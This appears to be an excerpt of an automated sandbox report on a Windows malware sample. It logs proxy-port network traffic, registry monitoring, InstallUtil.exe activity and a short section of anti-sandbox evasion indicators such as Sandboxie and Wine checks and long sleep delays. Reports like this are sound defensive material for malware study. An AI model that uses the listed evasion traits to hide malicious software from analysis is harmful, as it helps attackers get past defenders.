                    Source: unknownNetwork traffic detected: HTTP traffic on port 51321 -> 8881
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51314 -> 38242
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51156 -> 1081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51333 -> 2335
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 8888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51144 -> 20074
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51343 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51436 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50879
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51194 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51062 -> 7302
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51458 -> 15427
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51390 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51195 -> 5000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51393 -> 3000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51295 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51269 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51433 -> 1647
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8881 -> 51321
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51252 -> 9091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51508 -> 9367
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50934 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51486 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51559 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50683 -> 13988
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51491 -> 40927
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51590 -> 15393
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51316 -> 26154
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51552 -> 15685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51563 -> 87
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 17179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50965 -> 32520
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51220 -> 53935
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51208 -> 46286
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 56225
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6161 -> 51151
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 8090
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51588 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6467 -> 51138
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 48963
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51625 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51419 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51596 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51604 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 20002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51431 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51564 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50044
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51615 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50994
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 50737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51598 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50780 -> 23031
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 8193
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51477 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51430 -> 9091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50938 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51605 -> 1976
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51644 -> 63425
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51661 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51009 -> 34409
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 63135
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 25295
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51574 -> 9999
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51368 -> 7302
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 55215
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51040 -> 53397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51122 -> 38721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 17970
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51275 -> 46097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 28134
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51261 -> 38338
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53281 -> 50033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 20074 -> 51144
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 8081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51706 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51680 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51295
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51314 -> 38242
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 64556
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 51195
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51691 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51700 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51662 -> 11
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 51062
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51590 -> 15393
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50817 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51269
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8090 -> 50661
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51725 -> 4154
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: n1KVzXM8Wk.exe PID: 6812, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeMemory allocated: 119922A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeMemory allocated: 119ABC40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 32F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999822Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999717Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997827Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997608Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997156Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeWindow / User API: threadDelayed 2402Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeWindow / User API: threadDelayed 3996Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2649Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7168Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -200000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99657s >= -30000sJump to behavior
